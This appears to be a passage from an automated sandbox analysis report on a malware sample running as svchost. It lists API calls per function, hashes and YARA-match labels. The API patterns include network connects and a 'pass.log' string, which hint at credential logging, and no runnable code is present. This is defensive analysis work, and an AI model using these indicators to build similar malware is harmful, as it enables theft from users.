                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$AttributesCreateDirectoryMovefree
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1026147201-0
                                                                                                                                                                                                                    • Opcode ID: 6d56f136752f8de2cf715215aaabbe1badd567b4ca862488b421c707f727fe41
                                                                                                                                                                                                                    • Instruction ID: 6fbb9ba311c2d486b087baf120766f527d6bb41bf08a3a80a0ff45588bae05d7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6d56f136752f8de2cf715215aaabbe1badd567b4ca862488b421c707f727fe41
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D4413831A4429A8FDF21CF7888987F97FA49F9A344F1445EAE582CB245DB309705CBA1
                                                                                                                                                                                                                    Function 02C96E90 Relevance: 9.1, APIs: 6, Instructions: 108fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,00000000), ref: 02C96ED4
                                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,?,?,02C97817), ref: 02C96EEE
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,?,?,02C97817), ref: 02C96F16
                                                                                                                                                                                                                    • UnmapViewOfFile.KERNEL32(?,?,?,?,?,02C97817), ref: 02C96F22
                                                                                                                                                                                                                      • Part of subcall function 02C93E00: GetHandleInformation.KERNEL32(?,00000000), ref: 02C93E14
                                                                                                                                                                                                                      • Part of subcall function 02C93E00: CloseHandle.KERNEL32(?), ref: 02C93E25
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00140B17,00000000,00000000,00140B17,?,02C97817), ref: 02C96F4E
                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00140B17,02C97817,00000000,00140B17), ref: 02C96F80
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$HandleViewmemcpy$CloseCreateInformationMappingUnmapWrite
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3741995677-0
                                                                                                                                                                                                                    • Opcode ID: 734895cd69303071544915fd29f7e9f1ff6f361a64f3e53f8d6472fd81a7165e
                                                                                                                                                                                                                    • Instruction ID: da0cf13bb213f9a11f149eb5d0aceba496568976ad3535ebd0d50bc920cc0354
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 734895cd69303071544915fd29f7e9f1ff6f361a64f3e53f8d6472fd81a7165e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D9317C72A00209BBDB04DF99D884B6AF7BCFF58714F20825AE90497680D771AE60CBD0
                                                                                                                                                                                                                    Function 02C880E0 Relevance: 9.1, APIs: 6, Instructions: 106networkCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • WSAGetLastError.WS2_32 ref: 02C8810E
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C8813F
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C8816B
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C88192
                                                                                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000004), ref: 02C881B4
                                                                                                                                                                                                                    • WSASetLastError.WS2_32(?), ref: 02C881DE
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: QueryVirtual$ErrorLast$Read
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2835504744-0
                                                                                                                                                                                                                    • Opcode ID: c5fd1cbb214b15cdab6ce06d29a125c76e6a7ede30152256b383716933324556
                                                                                                                                                                                                                    • Instruction ID: e7fe724f489af6321f71dceae56ef92282b7923a0bf88af3b1335e520fe97cb7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c5fd1cbb214b15cdab6ce06d29a125c76e6a7ede30152256b383716933324556
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F41CAB1E0020DAFDB40DFA9D985AAEBBF9EF48304F518569E905E7200E7749A41CF90
                                                                                                                                                                                                                    Function 02C9F1E0 Relevance: 9.1, APIs: 6, Instructions: 100COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 02C9F540: htons.WS2_32(?), ref: 02C9F564
                                                                                                                                                                                                                      • Part of subcall function 02C9F540: inet_addr.WS2_32(?), ref: 02C9F56F
                                                                                                                                                                                                                      • Part of subcall function 02C9F540: htonl.WS2_32(000000FF), ref: 02C9F57A
                                                                                                                                                                                                                      • Part of subcall function 02C9F540: gethostbyname.WS2_32(?), ref: 02C9F586
                                                                                                                                                                                                                      • Part of subcall function 02C9F540: socket.WS2_32(00000002,00000001,00000000), ref: 02C9F5A0
                                                                                                                                                                                                                      • Part of subcall function 02C9F540: connect.WS2_32(00000000,?,00000010), ref: 02C9F5B3
                                                                                                                                                                                                                      • Part of subcall function 02C9F540: closesocket.WS2_32(00000000), ref: 02C9F5BE
                                                                                                                                                                                                                    • setsockopt.WS2_32(00000000,00000006,00000001,00000001,00000004), ref: 02C9F21F
                                                                                                                                                                                                                    • closesocket.WS2_32 ref: 02C9F234
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: closesocket$connectgethostbynamehtonlhtonsinet_addrsetsockoptsocket
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2706992148-0
                                                                                                                                                                                                                    • Opcode ID: 53adfa6ea3cf7b33249b95afa0770064adb70ff08dbdb1e7d2fb769282cd73ba
                                                                                                                                                                                                                    • Instruction ID: cc431ba2af91e8e9b9009b5b2c384af590350d5debc5c8f42bee17bc6d3df787
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 53adfa6ea3cf7b33249b95afa0770064adb70ff08dbdb1e7d2fb769282cd73ba
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A310A75A40615BBDB10CFA8E84DBEAB7A8FF05710F20825AF515C7180EB719A54CBE1
                                                                                                                                                                                                                    Function 02C79030 Relevance: 9.1, APIs: 6, Instructions: 88COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 02C79057
                                                                                                                                                                                                                    • IsRectEmpty.USER32(?), ref: 02C790C6
                                                                                                                                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 02C790D6
                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 02C790EA
                                                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,02C79754), ref: 02C790F3
                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,02C79754,00000000,00008001,0000630C,?,02C79754,00000000,00008001,?), ref: 02C79115
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$Rect$EmptyLongParentPoints
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 379166938-0
                                                                                                                                                                                                                    • Opcode ID: 374e363667ad26d19e2a5c50ec631439f3f6d0eb4c8d02660777ea6d35d9f735
                                                                                                                                                                                                                    • Instruction ID: 4e9a8a0b1bcc44802f0ea67f31edd1616058c903fd7bc8432f77e8a2b9c7038a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 374e363667ad26d19e2a5c50ec631439f3f6d0eb4c8d02660777ea6d35d9f735
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F313071E40219EFDB01CFA9D949AFEBBB8FF49710F104699E445A7240D7B09A10CBA1
                                                                                                                                                                                                                    Function 02C72860 Relevance: 9.1, APIs: 6, Instructions: 87COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: callocexitfree
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3367576030-0
                                                                                                                                                                                                                    • Opcode ID: 64cf0029b2f039a47c8f44471105e99cfb02d11d2272fc1700fe2650d6133c84
                                                                                                                                                                                                                    • Instruction ID: 969ca29441430a44ae7d068f8bd1570233bf6ff43ec5cf71020b18c90718a8d7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 64cf0029b2f039a47c8f44471105e99cfb02d11d2272fc1700fe2650d6133c84
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64213DB6A00359AFDB11CF58DC81BAB77A8FF88310F044569ED4597340D772EE108BA2
                                                                                                                                                                                                                    Function 02C81AC0 Relevance: 9.1, APIs: 6, Instructions: 63memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetAncestor.USER32(00000000,00000002,?,00000000), ref: 02C81ACE
                                                                                                                                                                                                                    • GetWindowTextA.USER32(00000000,?,00000104), ref: 02C81AE9
                                                                                                                                                                                                                      • Part of subcall function 02C81330: memset.MSVCRT ref: 02C81347
                                                                                                                                                                                                                      • Part of subcall function 02C81330: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,7622F550,00000000), ref: 02C8135E
                                                                                                                                                                                                                      • Part of subcall function 02C81330: PathAddBackslashA.SHLWAPI(?,?,7622F550,00000000), ref: 02C8136B
                                                                                                                                                                                                                      • Part of subcall function 02C81330: PathFileExistsA.SHLWAPI(?,?,7622F550,00000000), ref: 02C813A7
                                                                                                                                                                                                                      • Part of subcall function 02C81330: lstrcpynA.KERNEL32(02CC7C28,00000000,00000104,00000000,00000001,?,7622F550,00000000), ref: 02C813D1
                                                                                                                                                                                                                      • Part of subcall function 02C81330: GetProcessHeap.KERNEL32(00000000,00000000,?,7622F550,00000000), ref: 02C813E0
                                                                                                                                                                                                                      • Part of subcall function 02C81330: HeapValidate.KERNEL32(00000000,?,7622F550,00000000), ref: 02C813E3
                                                                                                                                                                                                                      • Part of subcall function 02C81330: GetProcessHeap.KERNEL32(00000000,00000000,?,7622F550,00000000), ref: 02C813F0
                                                                                                                                                                                                                      • Part of subcall function 02C81330: HeapFree.KERNEL32(00000000,?,7622F550,00000000), ref: 02C813F3
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C81B47
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C81B4A
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C81B57
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C81B5A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$Path$FreeValidate$AncestorBackslashExistsFileFolderTextWindowlstrcpynmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 649337724-0
                                                                                                                                                                                                                    • Opcode ID: 1d786c4ce8f3e7b9c375caa0773c66e8652aa73733a14f89ed2191edea3b9b28
                                                                                                                                                                                                                    • Instruction ID: 26e08be0b0e164c66fd54795b2ce944ec44a80d45b1e8e4f516e699ee8a2f7d6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d786c4ce8f3e7b9c375caa0773c66e8652aa73733a14f89ed2191edea3b9b28
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9611C8B1E4425457DB206B349C18FF33BE89B91358F088A94E88C87180FBB0D95ACB60
                                                                                                                                                                                                                    Function 02C973C0 Relevance: 8.8, APIs: 7, Instructions: 75memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,0006AFB0,00000000,00000000,00000000,?,02C97874,00000000,00140B17), ref: 02C973D5
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,02C97874,00000000,00140B17), ref: 02C973DC
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C973EF
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,02C97870,?,02C97874,00000000,00140B17), ref: 02C9749E
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000,?,02C97874,00000000,00140B17), ref: 02C974A1
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,02C97874,00000000,00140B17), ref: 02C974AD
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,02C97874,00000000,00140B17), ref: 02C974B0
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$AllocFreeValidatememset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 470506929-0
                                                                                                                                                                                                                    • Opcode ID: ee46b0cd924f0b3656249b19cb5aba9a251340cd2f2c060f71cc093169004b01
                                                                                                                                                                                                                    • Instruction ID: bcd05b34dfdb7e001c00c32e838f1f62bc3ad5fa811ead47d707cc04517c8152
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ee46b0cd924f0b3656249b19cb5aba9a251340cd2f2c060f71cc093169004b01
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6421EFB0A017009FCB21AFA5D888ACBFFE8FF4A744B00881DE55E8B201C734A405CF92
                                                                                                                                                                                                                    Function 02C89B20 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFC6B), ref: 02C89B47
                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?), ref: 02C89B85
                                                                                                                                                                                                                    • PathFileExistsA.SHLWAPI(?), ref: 02C89BC9
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FilePath$AttributesBackslashExists
                                                                                                                                                                                                                    • String ID: 7F1BFC6B$pass.log
                                                                                                                                                                                                                    • API String ID: 2713433229-624231546
                                                                                                                                                                                                                    • Opcode ID: 78619ef695ab782b7263028e11ce17cc6bd4f0f8d27fa45550990d259e2171eb
                                                                                                                                                                                                                    • Instruction ID: dd6b5d5ff430268dd9c764518b0ef113d75c22a133e28c216694d89d03cf3145
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 78619ef695ab782b7263028e11ce17cc6bd4f0f8d27fa45550990d259e2171eb
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 691127319046484BD7229B28A8A47F7BBE4EFC6301F14C6E4ECCAD7301EA30DA59C780
                                                                                                                                                                                                                    Function 02C76930 Relevance: 8.8, APIs: 7, Instructions: 64memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 02C76570: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C76596
                                                                                                                                                                                                                      • Part of subcall function 02C76570: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765B7
                                                                                                                                                                                                                      • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765DD
                                                                                                                                                                                                                      • Part of subcall function 02C76570: RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765E4
                                                                                                                                                                                                                      • Part of subcall function 02C76570: memset.MSVCRT ref: 02C765F4
                                                                                                                                                                                                                      • Part of subcall function 02C76570: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76616
                                                                                                                                                                                                                      • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76622
                                                                                                                                                                                                                      • Part of subcall function 02C76570: HeapValidate.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76629
                                                                                                                                                                                                                      • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76636
                                                                                                                                                                                                                      • Part of subcall function 02C76570: HeapFree.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C7663D
                                                                                                                                                                                                                      • Part of subcall function 02C76570: GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C7665D
                                                                                                                                                                                                                      • Part of subcall function 02C76570: CloseHandle.KERNEL32(00000000), ref: 02C7666E
                                                                                                                                                                                                                      • Part of subcall function 02C76570: IsBadWritePtr.KERNEL32(?,00000004), ref: 02C7667E
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000013,?,00000000,00000000,00000000,75AF5CE0,02C82897), ref: 02C7696C
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C76973
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C76983
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,75AF5CE0,02C82897), ref: 02C769A5
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C769A8
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C769B5
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C769B8
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$File$FreeHandleValidatememset$AllocAllocateCloseCreateInformationReadSizeWrite
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1057660858-0
                                                                                                                                                                                                                    • Opcode ID: f377347343ddea82a5b582f989365a99ecd9eccaf66547f3de79fc0db7b6716e
                                                                                                                                                                                                                    • Instruction ID: 58932f77280adc2f93b47e823172b600c7e8a6d5802ac6a8ee26dcbea9958889
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f377347343ddea82a5b582f989365a99ecd9eccaf66547f3de79fc0db7b6716e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5511E572F41658A7C725ABA5AC48F9BB76CDFC0B55F140168B909D7280DB70DE14CBE0
                                                                                                                                                                                                                    Function 02C862E0 Relevance: 8.8, APIs: 7, Instructions: 50memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 02C92F00: OpenProcess.KERNEL32(00000000,00001400,00000000,00000000,7734FFB0,?,?,?,?,?,?,02C86436,?,00000000), ref: 02C92F2C
                                                                                                                                                                                                                      • Part of subcall function 02C92F00: GetProcessTimes.KERNEL32(00000000,02C86436,?,?,?,?,?,?,?,?,?,02C86436,?,00000000), ref: 02C92F4A
                                                                                                                                                                                                                      • Part of subcall function 02C92F00: GetHandleInformation.KERNEL32(00000000,?,?,?,?,?,?,?,02C86436,?,00000000), ref: 02C92F68
                                                                                                                                                                                                                      • Part of subcall function 02C92F00: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,02C86436,?,00000000), ref: 02C92F79
                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(02CBD8A0,?,00000000,00000000,02C865A8), ref: 02C862F9
                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(02CBD8A0), ref: 02C86315
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,092F3178), ref: 02C8633A
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C8633D
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,092F3178), ref: 02C8634A
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C8634D
                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(02CBD8A0), ref: 02C86358
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HeapProcess$CriticalSection$HandleLeave$CloseEnterFreeInformationOpenTimesValidate
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3901171168-0
                                                                                                                                                                                                                    • Opcode ID: 26c6d85392eb8c4a16e942620162100858da66d781d82b7ac1ffba0ce0e35a5f
                                                                                                                                                                                                                    • Instruction ID: e16848d6b56a16331ab7f53f00c9a1bda535184f7d0ec46107e6b32ba09f805d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 26c6d85392eb8c4a16e942620162100858da66d781d82b7ac1ffba0ce0e35a5f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D01D832F44310A7DB217FA6F848B5A779CDFC4B56F244969E646C7240C7715414CBD0
                                                                                                                                                                                                                    Function 02C9A8B0 Relevance: 7.7, APIs: 5, Instructions: 239COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • malloc.MSVCRT ref: 02C9A909
                                                                                                                                                                                                                      • Part of subcall function 02C9F0F0: __WSAFDIsSet.WS2_32(?,?), ref: 02C9F1A0
                                                                                                                                                                                                                      • Part of subcall function 02C9F0F0: closesocket.WS2_32(?), ref: 02C9F1BD
                                                                                                                                                                                                                    • realloc.MSVCRT ref: 02C9A915
                                                                                                                                                                                                                    • malloc.MSVCRT ref: 02C9A94D
                                                                                                                                                                                                                    • realloc.MSVCRT ref: 02C9A959
                                                                                                                                                                                                                    • malloc.MSVCRT ref: 02C9A9AC
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: malloc$realloc$closesocket
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3133911991-0
                                                                                                                                                                                                                    • Opcode ID: 0356a3c1231401b6a7be1d7f5de1c8159a5ac392767ba78456acf3909ac10746
                                                                                                                                                                                                                    • Instruction ID: 234d781074eed9ee82bdb69a372c02d58ebd33085692b2bbe08d611481305c46
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0356a3c1231401b6a7be1d7f5de1c8159a5ac392767ba78456acf3909ac10746
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BD91B471E006468FCF04CF69DD94BEA37A6FF84305F1985B9ED099B346D634AA11CBA0
